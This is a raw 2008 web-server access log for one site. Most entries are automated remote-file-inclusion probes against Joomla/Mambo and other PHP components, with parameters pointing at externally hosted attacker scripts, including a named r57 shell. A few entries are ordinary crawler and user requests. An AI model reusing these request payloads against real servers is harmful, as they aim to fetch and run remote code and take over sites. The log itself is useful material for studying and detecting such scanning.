209.44.101.82 - - [26/Feb/2008:10:29:21 -0800] "GET /logs/errors.php?error=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.44.101.82 - - [26/Feb/2008:10:29:29 -0800] "GET /logs/access.log/errors.php?error=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.44.101.82 - - [26/Feb/2008:10:29:29 -0800] "GET /errors.php?error=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.44.101.82 - - [26/Feb/2008:10:29:29 -0800] "GET /logs/errors.php?error=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:10:29:50 -0800] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:29:58 -0800] "GET /logs/access_080118.log/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:29:59 -0800] "GET /logs/access_080211.log/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
213.186.126.68 - - [26/Feb/2008:10:31:11 -0800] "GET /logs/access_080119.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.186.126.68 - - [26/Feb/2008:10:31:11 -0800] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.186.126.68 - - [26/Feb/2008:10:31:12 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:10:31:13 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.186.126.68 - - [26/Feb/2008:10:31:38 -0800] "GET /logs/access_080119.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.186.126.68 - - [26/Feb/2008:10:31:38 -0800] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.186.126.68 - - [26/Feb/2008:10:31:39 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.62.191.127 - - [26/Feb/2008:10:31:52 -0800] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.62.191.127 - - [26/Feb/2008:10:31:57 -0800] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.62.191.127 - - [26/Feb/2008:10:32:14 -0800] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.29.164.6 - - [26/Feb/2008:10:32:51 -0800] "GET //skin/zero_vote/error.php?dir=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.177.226.178 - - [26/Feb/2008:10:33:35 -0800] "GET /logs/access_080126.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.177.226.178 - - [26/Feb/2008:10:33:36 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.186.126.68 - - [26/Feb/2008:10:33:45 -0800] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.186.126.68 - - [26/Feb/2008:10:33:45 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:33:46 -0800] "GET /logs/access_080201.log/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
213.186.126.68 - - [26/Feb/2008:10:33:54 -0800] "GET /logs/access_080131.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.29.152.248 - - [26/Feb/2008:10:33:57 -0800] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.29.152.248 - - [26/Feb/2008:10:33:57 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.29.152.248 - - [26/Feb/2008:10:33:57 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
213.186.126.68 - - [26/Feb/2008:10:33:58 -0800] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.186.126.68 - - [26/Feb/2008:10:33:59 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.186.126.68 - - [26/Feb/2008:10:34:19 -0800] "GET /logs/access_080131.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:35:26 -0800] "GET /logs/access_080131.log/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:10:35:38 -0800] "GET /logs/access_080121.log//components/com_minibb.php?absolute_path=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:10:35:39 -0800] "GET //components/com_minibb.php?absolute_path=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:10:35:39 -0800] "GET /logs//components/com_minibb.php?absolute_path=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:36:08 -0800] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:36:13 -0800] "GET /logs/access_080122.log/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:10:36:35 -0800] "GET /logs/access_080105.log//modules/xfsection/modify.php?dir_module=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:10:36:35 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:10:36:35 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.46.171.144 - - [26/Feb/2008:10:37:21 -0800] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.downloadblog.altervista.org/k0tw.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
213.193.222.218 - - [26/Feb/2008:10:37:39 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.tecumsehscoutcabin.org//calendar/setup/vi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [26/Feb/2008:10:37:39 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.tecumsehscoutcabin.org//calendar/setup/vi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.186.126.68 - - [26/Feb/2008:10:37:46 -0800] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [26/Feb/2008:10:37:58 -0800] "GET /logs/access_080211.log//components/com_simpleboard/image_upload.php?sbp=http://www.tecumsehscoutcabin.org//calendar/setup/vi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.35.158.180 - - [26/Feb/2008:10:38:00 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.186.126.68 - - [26/Feb/2008:10:38:00 -0800] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.177.226.178 - - [26/Feb/2008:10:39:02 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:10:39:09 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:10:39:47 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:10:39:48 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:10:39:48 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.152.152 - - [26/Feb/2008:10:40:18 -0800] "GET //appserv/main.php?appserv_root=http://www.marthamaria-halle.de//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
85.119.152.152 - - [26/Feb/2008:10:40:18 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.marthamaria-halle.de//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:41:08 -0800] "GET /logs/access_080118.log/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:41:09 -0800] "GET /logs/access_080211.log/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:10:41:54 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:10:41:57 -0800] "GET /logs/access_080108.log//components/com_minibb.php?absolute_path=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.125 - - [26/Feb/2008:10:42:24 -0800] "GET /mobileoffice/?S=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20071214 BonEcho/2.0.0.4" "www.dmulk.com"
222.135.109.228 - - [26/Feb/2008:10:42:30 -0800] "GET /index.php?pagina=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.191.48.162 - - [26/Feb/2008:10:43:22 -0800] "GET /logs/access_080122.log//index.php?option=com_zoom&Itemid=33&catid=25&mosConfig_absolute_path=http://www.computermonitoringmanagement.com/images/.bash/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.45.242.50 - - [26/Feb/2008:10:43:58 -0800] "GET //news.php?dir=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
66.45.242.50 - - [26/Feb/2008:10:44:03 -0800] "GET /logs//news.php?dir=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:10:46:32 -0800] "GET /plans/ HTTP/1.1" 200 1111 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:10:46:34 -0800] "GET /plans/sdgeorge/ HTTP/1.1" 401 395 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.80.157.162 - sdgeorge@dmulk.com [26/Feb/2008:10:47:12 -0800] "GET /plans/sdgeorge/ HTTP/1.1" 401 395 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
213.195.77.225 - - [26/Feb/2008:10:47:15 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.28.112.246 - - [26/Feb/2008:10:47:27 -0800] "GET /logs/access_080122.log/Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.246 - - [26/Feb/2008:10:47:28 -0800] "GET /Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.246 - - [26/Feb/2008:10:47:28 -0800] "GET /logs/Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.29.164.6 - - [26/Feb/2008:10:47:36 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:47:50 -0800] "GET /logs/access_080201.log/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:10:48:42 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:10:48:42 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:10:48:43 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.215.228.98 - - [26/Feb/2008:10:49:01 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.lennoxpetroleum.com/forum/db/db.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.228.98 - - [26/Feb/2008:10:49:01 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.lennoxpetroleum.com/forum/db/db.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.228.98 - - [26/Feb/2008:10:49:01 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.lennoxpetroleum.com/forum/db/db.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:10:49:18 -0800] "GET /Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.216.97 - - [26/Feb/2008:10:49:22 -0800] "GET /logs/access_080201.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.28.112.246 - - [26/Feb/2008:10:49:32 -0800] "GET /Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:10:49:35 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.117.225.155 - - [26/Feb/2008:10:49:38 -0800] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [26/Feb/2008:10:49:39 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [26/Feb/2008:10:49:39 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:10:49:45 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:10:49:45 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:10:49:45 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:10:49:49 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.28.112.242 - - [26/Feb/2008:10:50:31 -0800] "GET /Components/com_performs/performs.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.60.207.171 - - [26/Feb/2008:10:50:45 -0800] "GET /index.php?mosConfig_absolute_path=http://flowflash.net/flash/media/var1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:50:47 -0800] "GET /logs/access_080131.log/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
67.28.112.242 - - [26/Feb/2008:10:50:59 -0800] "GET /logs/access_080122.log/Components/com_performs/performs.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.242 - - [26/Feb/2008:10:50:59 -0800] "GET /Components/com_performs/performs.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.242 - - [26/Feb/2008:10:50:59 -0800] "GET /logs/Components/com_performs/performs.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.119.157.77 - - [26/Feb/2008:10:51:59 -0800] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.drivingcenter-baden.de/_grafik/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.119.157.77 - - [26/Feb/2008:10:51:59 -0800] "GET /logs/access_080211.log/errors.php?error=http://www.drivingcenter-baden.de/_grafik/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.119.157.77 - - [26/Feb/2008:10:52:00 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.drivingcenter-baden.de/_grafik/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.119.157.77 - - [26/Feb/2008:10:52:00 -0800] "GET /errors.php?error=http://www.drivingcenter-baden.de/_grafik/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.119.157.77 - - [26/Feb/2008:10:52:00 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.drivingcenter-baden.de/_grafik/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.119.157.77 - - [26/Feb/2008:10:52:01 -0800] "GET /logs/errors.php?error=http://www.drivingcenter-baden.de/_grafik/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:52:10 -0800] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:52:21 -0800] "GET /logs/access_080122.log/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:10:52:24 -0800] "GET /logs/access_080122.log/Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:10:52:24 -0800] "GET /Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.247 - - [26/Feb/2008:10:52:24 -0800] "GET /logs/Administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.203.227 - - [26/Feb/2008:10:53:32 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hospdex.kit.net/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
62.193.203.227 - - [26/Feb/2008:10:53:32 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hospdex.kit.net/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
213.215.228.98 - - [26/Feb/2008:10:53:56 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.lennoxpetroleum.com/forum/db/db.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.117.225.155 - - [26/Feb/2008:10:54:14 -0800] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [26/Feb/2008:10:54:15 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
